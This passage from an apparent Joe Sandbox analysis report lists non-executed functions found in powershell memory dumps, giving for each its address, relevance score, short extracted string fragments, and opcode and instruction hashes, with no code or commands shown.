                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                        • Instruction Fuzzy Hash: 54D067B0D042099F8780EFBDC94156EFBF4EB48204F6085AAC919E7301F7329A22CBD1

                                                        Non-executed Functions

                                                        Function 06F8E3E8 Relevance: 22.9, Strings: 18, Instructions: 384COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$4']q$4']q$84ql$84ql$TQbq$TQbq$TQbq$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                        • API String ID: 0-1182776119
                                                        • Opcode ID: f0610c281220d66c7a37b0ea068f5e99d4fd7b67f65068e2af5a8c2d16ff2e3a
                                                        • Instruction ID: 82f59363e6142479d096bdd2c50b8fe88462804b6c2e58a8234a5dd8b8ad6519
                                                        • Opcode Fuzzy Hash: f0610c281220d66c7a37b0ea068f5e99d4fd7b67f65068e2af5a8c2d16ff2e3a
                                                        • Instruction Fuzzy Hash: 10D14736F04319CFDB64AF68C9146AE7BE2BF85310F1484EAE8158B295DB35CC44C7A1
                                                        Function 06F8E900 Relevance: 19.1, Strings: 15, Instructions: 311COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$84ql$84ql$84ql$84ql$tP]q$tP]q$tP]q$tP]q$$]q$(cq$(cq$(cq$(cq
                                                        • API String ID: 0-750411764
                                                        • Opcode ID: c100ccb376927240b82bbef6d6fea34a6c953c8872162c43896f823b7c7268c0
                                                        • Instruction ID: 62f591539cde410ae40d7e30662c501a49c51085ebe2c607f0d083ec5d17b397
                                                        • Opcode Fuzzy Hash: c100ccb376927240b82bbef6d6fea34a6c953c8872162c43896f823b7c7268c0
                                                        • Instruction Fuzzy Hash: AFB13731F002189FDB64AF68C944ABABBF6FF88710F1484A9E8059B395CB35DC41C7A1
                                                        Function 06F8A4B0 Relevance: 15.5, Strings: 12, Instructions: 498COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                        • API String ID: 0-835445502
                                                        • Opcode ID: fa973c3b00933a75a84fbc4d63c6745f0684927765cbe3efbb5eef36bdaeafa9
                                                        • Instruction ID: f3ad131cb39ff0470fca1f7299b97f3d26a20e6d972dff3322ba05bafc6bbd59
                                                        • Opcode Fuzzy Hash: fa973c3b00933a75a84fbc4d63c6745f0684927765cbe3efbb5eef36bdaeafa9
                                                        • Instruction Fuzzy Hash: 33F11832F04205CFDB68AF6C85506AABBE2EFC4710F1484ABD905CB255DB36DD42C7A1
                                                        Function 06F8E088 Relevance: 14.0, Strings: 11, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$84ql$84ql$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                                        • API String ID: 0-1287290550
                                                        • Opcode ID: a518af5ce1dc40adc55d403f597eae76d411bf00fd7460ab23a470945a6560ef
                                                        • Instruction ID: e26788bea2ae498b41585de1d3092b7dbe38189a37c72109efa577744ecae1d4
                                                        • Opcode Fuzzy Hash: a518af5ce1dc40adc55d403f597eae76d411bf00fd7460ab23a470945a6560ef
                                                        • Instruction Fuzzy Hash: 3E814631F04215DFDB69AF28C951AAABFE6FF84310F1484A9E8059B3A0DB35DD40C7A1
                                                        Function 06F8E8FF Relevance: 11.4, Strings: 9, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$84ql$84ql$tP]q$tP]q$$]q$(cq$(cq$(cq
                                                        • API String ID: 0-1299017810
                                                        • Opcode ID: 4d8a07dc6986c5fa0d4a15d9cbc56cc27a9d5b357b1e98c66702ac0fee37afa5
                                                        • Instruction ID: 3647388aa5d99da4cdaaaacdadf0a505b368af9fd5033020fcbc52046d46bcf7
                                                        • Opcode Fuzzy Hash: 4d8a07dc6986c5fa0d4a15d9cbc56cc27a9d5b357b1e98c66702ac0fee37afa5
                                                        • Instruction Fuzzy Hash: 6661A031F00215DFDBA4EE59C584BAABBF2BF85720F1984D9E8056B295C771DC80CBA1
                                                        Function 06F8F3A5 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 84ql$84ql$XRbq$XRbq$XRbq$tP]q$tP]q$$]q
                                                        • API String ID: 0-1014787239
                                                        • Opcode ID: 0033e30fdbea95535a31e36b2d64638a420cbc7cdc387baa122945d620582565
                                                        • Instruction ID: 74d639244f3dc11b0fdc8873260d265d70d40750ad029c747bb3d2123f7c82e5
                                                        • Opcode Fuzzy Hash: 0033e30fdbea95535a31e36b2d64638a420cbc7cdc387baa122945d620582565
                                                        • Instruction Fuzzy Hash: 28612431F012148FDB64AF68C540AAABBA2BFC5350F24C4AAE8059F295CB35CC41CBA1
                                                        Function 06F8E59D Relevance: 10.2, Strings: 8, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$84ql$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                                        • API String ID: 0-938013914
                                                        • Opcode ID: dbd4e495c78475f6bb09aea244157b8fdd9bd465b2826437329e8510599dcd70
                                                        • Instruction ID: 6deb569654907a71f78cfdcb9d1c4a1582430d66b0b168e58d944fb15f09bf9a
                                                        • Opcode Fuzzy Hash: dbd4e495c78475f6bb09aea244157b8fdd9bd465b2826437329e8510599dcd70
                                                        • Instruction Fuzzy Hash: 0451F331E14309DFEBA5AE08C944BAE77E2BF45751F5880EAE8159B291C735DC80CBA1
                                                        Function 040AAFD8 Relevance: 9.2, Strings: 7, Instructions: 456COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Haq$h]=m$h]=m$h]=m$$]q$$]q$I=m
                                                        • API String ID: 0-1881191483
                                                        • Opcode ID: 83136093873ca2c1c244877647c92fc6924da82e251d4133796b8746876c93bd
                                                        • Instruction ID: 343c13ffe2158c6bfaa4b0ff9094139424e675cd48ad01f695befd29579661fc
                                                        • Opcode Fuzzy Hash: 83136093873ca2c1c244877647c92fc6924da82e251d4133796b8746876c93bd
                                                        • Instruction Fuzzy Hash: C1126034B002188FCB65DF64D854BAEB7B6BF89304F1440A9D50AAB365DF35AE85CF81
                                                        Function 06F8E068 Relevance: 8.9, Strings: 7, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$84ql$d%cq$d%cq$d%cq$tP]q$$]q
                                                        • API String ID: 0-708213121
                                                        • Opcode ID: dc9fb4f7a649c437523d2d91df04e2ace7ac1e985aa70a7fa2ba3463e0912b4d
                                                        • Instruction ID: 36411cc48ebae8a27f3931161f2f3a1da7784cb3f07b6965cf34023d7a318af3
                                                        • Opcode Fuzzy Hash: dc9fb4f7a649c437523d2d91df04e2ace7ac1e985aa70a7fa2ba3463e0912b4d
                                                        • Instruction Fuzzy Hash: 52510631F04215DFEB64AF25C981AA9BFF2AF85750F1884DAE8059B2A1CB35DD40C7A1
                                                        Function 06F80AE8 Relevance: 8.9, Strings: 7, Instructions: 126COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tP]q$tP]q$$]q$$]q$$]q$il$il
                                                        • API String ID: 0-2269369362
                                                        • Opcode ID: ca452a48aa1c1bfe906ae20cb352f2dbb396231e541ad9c365e6e0c845a3fa4e
                                                        • Instruction ID: ae96c381af2c0433481bab56887248fada5910464570fe688f4cf5b556cfec67
                                                        • Opcode Fuzzy Hash: ca452a48aa1c1bfe906ae20cb352f2dbb396231e541ad9c365e6e0c845a3fa4e
                                                        • Instruction Fuzzy Hash: BE418C32B083558FD7555B399810566BFF5EF82720B6980EBE884CB362CE35CC09C3A1
                                                        Function 06F8B7B6 Relevance: 7.9, Strings: 6, Instructions: 403COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$4']q$4']q$x.dk$-dk
                                                        • API String ID: 0-1821401884
                                                        • Opcode ID: 591fde5f705e57ad892a9e125aa7381eea0be27a7725bbfffa9fe9490db14009
                                                        • Instruction ID: aee4a5203efe5d4cac46707c02c7986fb7a86d17fc216c5c77d8232d7ea939fc
                                                        • Opcode Fuzzy Hash: 591fde5f705e57ad892a9e125aa7381eea0be27a7725bbfffa9fe9490db14009
                                                        • Instruction Fuzzy Hash: 8F121A74A002198FDB64DF14CD91BEABBB2FB45300F1085E5D509AB391CB76AE85CF91
                                                        Function 06F82790 Relevance: 7.7, Strings: 6, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tck$0U]q$4']q$4']q$XYsl$XYsl
                                                        • API String ID: 0-530006764
                                                        • Opcode ID: f15c33fde8c0f2f589994f87635483d382d1ff8ce1addeef706f4561b01176d5
                                                        • Instruction ID: 644469a09391d6d329d9efa7796b11f1fe28dbf0350a0820e627a83bc73b3b65
                                                        • Opcode Fuzzy Hash: f15c33fde8c0f2f589994f87635483d382d1ff8ce1addeef706f4561b01176d5
                                                        • Instruction Fuzzy Hash: E2715632F042148FCB94AB6D955056ABBE6EFC5220B24C0FBD409CB259DA35EE46C7E1
                                                        Function 06F8AB04 Relevance: 7.6, Strings: 6, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                        • API String ID: 0-3723351465
                                                        • Opcode ID: 21a852e32f75ad2d096c18cbad0f3409e40ce35f9e4b341c6daab1e2af804ce0
                                                        • Instruction ID: 1701d2f19dbe1d58f17afee82f7cd680753cfea063b92cbfd79a77f1dc1b88b0
                                                        • Opcode Fuzzy Hash: 21a852e32f75ad2d096c18cbad0f3409e40ce35f9e4b341c6daab1e2af804ce0
                                                        • Instruction Fuzzy Hash: EE217937F082498FDBA92A69A8805B6B7E6FFD121171484FBD881C7242DE35C819C3A1
                                                        Function 06F8E1AE Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$84ql$d%cq$d%cq$d%cq$tP]q
                                                        • API String ID: 0-3309415578
                                                        • Opcode ID: 8caa0fd6f2f6be0570cff3792c07a1a9ed3e325045b053eb1047c7f3cac6bc7f
                                                        • Instruction ID: 9df77ad1cd53365d70d33b2c411cac2ae5e1c5608a627ce4985655b2063b28a4
                                                        • Opcode Fuzzy Hash: 8caa0fd6f2f6be0570cff3792c07a1a9ed3e325045b053eb1047c7f3cac6bc7f
                                                        • Instruction Fuzzy Hash: A531C031F00215DFDB64EF58C980AA9BBB2FF88710F158599E805AB360C739DD01CBA1
                                                        Function 06F8ED10 Relevance: 6.5, Strings: 5, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 84ql$84ql$tP]q$tP]q$$]q
                                                        • API String ID: 0-3063176222
                                                        • Opcode ID: 7667a51f4eb115f86c8e8408df2b524e02a6439538130861a1e44ff918e329eb
                                                        • Instruction ID: 2ea35e23b683bf07fd70ed071b1e4eb212479f0b6bebd70c1343a23458724f1a
                                                        • Opcode Fuzzy Hash: 7667a51f4eb115f86c8e8408df2b524e02a6439538130861a1e44ff918e329eb
                                                        • Instruction Fuzzy Hash: D9711432F00208DFD764AF68C904A6ABBE7AF89710F15C4A9E8059F391CB35DD45CBA1
                                                        Function 06F8D6C0 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                        • API String ID: 0-2353078639
                                                        • Opcode ID: 320563ab77058d89e4a0899a2c30a37957fc5e8ae43899d60b79cde8c2f23da6
                                                        • Instruction ID: 0dfb68c76aba856a9dc3f02e7f7dfbb6571122c375a8f76177d04ad542f08557
                                                        • Opcode Fuzzy Hash: 320563ab77058d89e4a0899a2c30a37957fc5e8ae43899d60b79cde8c2f23da6
                                                        • Instruction Fuzzy Hash: 32511635F08248DFDBA9AF28C4446AE7BB2BF81310F14C4EAD8598B2D1DB34D944CB91
                                                        Function 06F80538 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                        • API String ID: 0-2353078639
                                                        • Opcode ID: 425eaf31dd35591fd170dad9c4fa45d83e57028e55bc09f20a8d38e49cc193f9
                                                        • Instruction ID: a765663f4c6d1d36fb2ff5c117afe4f15c715ffed785648d6c204f0ff3af2bde
                                                        • Opcode Fuzzy Hash: 425eaf31dd35591fd170dad9c4fa45d83e57028e55bc09f20a8d38e49cc193f9
                                                        • Instruction Fuzzy Hash: D7415A32F043059FDB556A3898106BB7FA1DFC2210F9444AAD945CB292DF36C989C7F2
                                                        Function 06F854C8 Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                        • API String ID: 0-2353078639
                                                        • Opcode ID: 31bf3e9cd0d5b74516ef7a179b97175989c88c3152e80aae7c42414d4c5b389f
                                                        • Instruction ID: 6089b343ea7e4977ec6d5ad8cb69f32a4d0e1622d7cc4b85b06701b0c966e5f6
                                                        • Opcode Fuzzy Hash: 31bf3e9cd0d5b74516ef7a179b97175989c88c3152e80aae7c42414d4c5b389f
                                                        • Instruction Fuzzy Hash: F3414A32F00346DFDBE96E2C84901BABBE7AFC2225B6484EBD8558F151DB31C801C751
                                                        Function 06F8A730 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                        • API String ID: 0-2702571027
                                                        • Opcode ID: 3ca82bc565955daa2fb73c4fd6ec22abd1ebeb574dc407d9c222d2758becb775
                                                        • Instruction ID: d708b1908026d2ef1268a51c53a56b4dd7ebb6891a0d5d9d739049837b2b9b9a
                                                        • Opcode Fuzzy Hash: 3ca82bc565955daa2fb73c4fd6ec22abd1ebeb574dc407d9c222d2758becb775
                                                        • Instruction Fuzzy Hash: 7431F332E08205EFEBA8AE15C544B69B7B1EB44720F18C0E7D8155B295C736D842CBA1
                                                        Function 06F81598 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q$$]q$il$il
                                                        • API String ID: 0-3875059678
                                                        • Opcode ID: 03cc7e351ac0170fbb880d79be49f2ac12bbb81516260ff42a01ebaf81faa456
                                                        • Instruction ID: 38388e826bea01199b7e2ee4774bb3611900a8cac2fef502839bab3d0aa1c39e
                                                        • Opcode Fuzzy Hash: 03cc7e351ac0170fbb880d79be49f2ac12bbb81516260ff42a01ebaf81faa456
                                                        • Instruction Fuzzy Hash: 7F11EC32F043069FEB74A96E9810B67B79ABBD1761F28856AE8868B350CA71C442C750
                                                        Function 040AE6A8 Relevance: 5.5, Strings: 4, Instructions: 470COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: _$_$_$_
                                                        • API String ID: 0-738436413
                                                        • Opcode ID: 827f74bd52dacf513862ab796250091d0ef2442e44521f87a6b07a45b88fc9d4
                                                        • Instruction ID: 7e8080904441d4088278f9b9b8ec6fa46d51d4a4782d573127d3263b4323c96a
                                                        • Opcode Fuzzy Hash: 827f74bd52dacf513862ab796250091d0ef2442e44521f87a6b07a45b88fc9d4
                                                        • Instruction Fuzzy Hash: 8B12AE34A052489FCB45CFA8C894A9EBFF1FF49310F19819AE845AB362D731ED45CB91
                                                        Function 06F87B60 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (fsl$(fsl$(fsl$(fsl
                                                        • API String ID: 0-2021254019
                                                        • Opcode ID: b0f9f81d36314e1a39acf1569c2cd60348b4cecf2274aaa07432b9efe48e65ad
                                                        • Instruction ID: c6145beff0a2efb310c8630b88913b20347479cbd0d388cde4d903b12fc70d23
                                                        • Opcode Fuzzy Hash: b0f9f81d36314e1a39acf1569c2cd60348b4cecf2274aaa07432b9efe48e65ad
                                                        • Instruction Fuzzy Hash: 46716C71E002148FDB54EF58C591BAEBBA3FF85310F2495A9D805AB356DB32EC41CBA1
                                                        Function 06F85D90 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 84ql$84ql$tP]q$tP]q
                                                        • API String ID: 0-4086356141
                                                        • Opcode ID: fe9c6350672ed7661363875aa8034576b05c33c0e23fa7c005d5113d6bd1cd0c
                                                        • Instruction ID: 7f2575092f52ddc554fc4e29a07debdeacfddcda74eb2079f9e1a48c222b6c78
                                                        • Opcode Fuzzy Hash: fe9c6350672ed7661363875aa8034576b05c33c0e23fa7c005d5113d6bd1cd0c
                                                        • Instruction Fuzzy Hash: 09513A31F042059FC7999F68C991ABABFF2AF84710F1888EAD9458B291DB31DD41C7A1
                                                        Function 040AEC2D Relevance: 5.1, Strings: 4, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2688800150.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: _$_$_$_
                                                        • API String ID: 0-738436413
                                                        • Opcode ID: 5249a36c3baff894d0383943ea34876030a333b74c12d4f1b904d8c1a1ddda50
                                                        • Instruction ID: 78048fcc9bca177e13597c9d5f22e603277f0ee8b41144757c2b3378c145201f
                                                        • Opcode Fuzzy Hash: 5249a36c3baff894d0383943ea34876030a333b74c12d4f1b904d8c1a1ddda50
                                                        • Instruction Fuzzy Hash: 9641345A85E3D05ED7035B789C745AA3FB99E1359AB1E00E7D0D0CF0B3E0494A1EC7A2
                                                        Function 06F89840 Relevance: 5.1, Strings: 4, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ,Ssl$,Ssl$p5ck$xSsl
                                                        • API String ID: 0-2225154413
                                                        • Opcode ID: 73d5574c2797838c6856b9dbbaed7f165b25fb5e228c4e53fdb3ed5a5422f691
                                                        • Instruction ID: 53142aa237e98cd46d613fd197aee96350aa9faaf23ecbb17bcbab53f30177eb
                                                        • Opcode Fuzzy Hash: 73d5574c2797838c6856b9dbbaed7f165b25fb5e228c4e53fdb3ed5a5422f691
                                                        • Instruction Fuzzy Hash: 4B415772F043059FC750AB2C89117BABFE6DF86310F0484AAD449DB286DAB2C841C7A2
                                                        Function 06F836A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q$$]q$$]q
                                                        • API String ID: 0-858218434
                                                        • Opcode ID: 40b909562b47241f293846a76986ce2c433547c74466120a3d7b1ddca11719b8
                                                        • Instruction ID: 357677f836be196bb7705386931eeac4171fdd1142e441069d77f33ead55067e
                                                        • Opcode Fuzzy Hash: 40b909562b47241f293846a76986ce2c433547c74466120a3d7b1ddca11719b8
                                                        • Instruction Fuzzy Hash: 5D218E73B082019FEB6869AD8850B3BB6DA9FC0F11F20847AD805C73A1DD36C801C771
                                                        Function 06F8AB40 Relevance: 5.1, Strings: 4, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q$$]q$$]q
                                                        • API String ID: 0-858218434
                                                        • Opcode ID: 7c64f25540177783d567c1ed98e47b6f28e2c72cbe0ebc8d8053b5240cbe1525
                                                        • Instruction ID: aa57b3c28d5222ede2fdf95e229d2531981667058729a8471be9fb2d2aa5e59c
                                                        • Opcode Fuzzy Hash: 7c64f25540177783d567c1ed98e47b6f28e2c72cbe0ebc8d8053b5240cbe1525
                                                        • Instruction Fuzzy Hash: E4210A37F0834A8FEBF92E699840272B7B2EF92211B1884FBD49147142DB36C054D352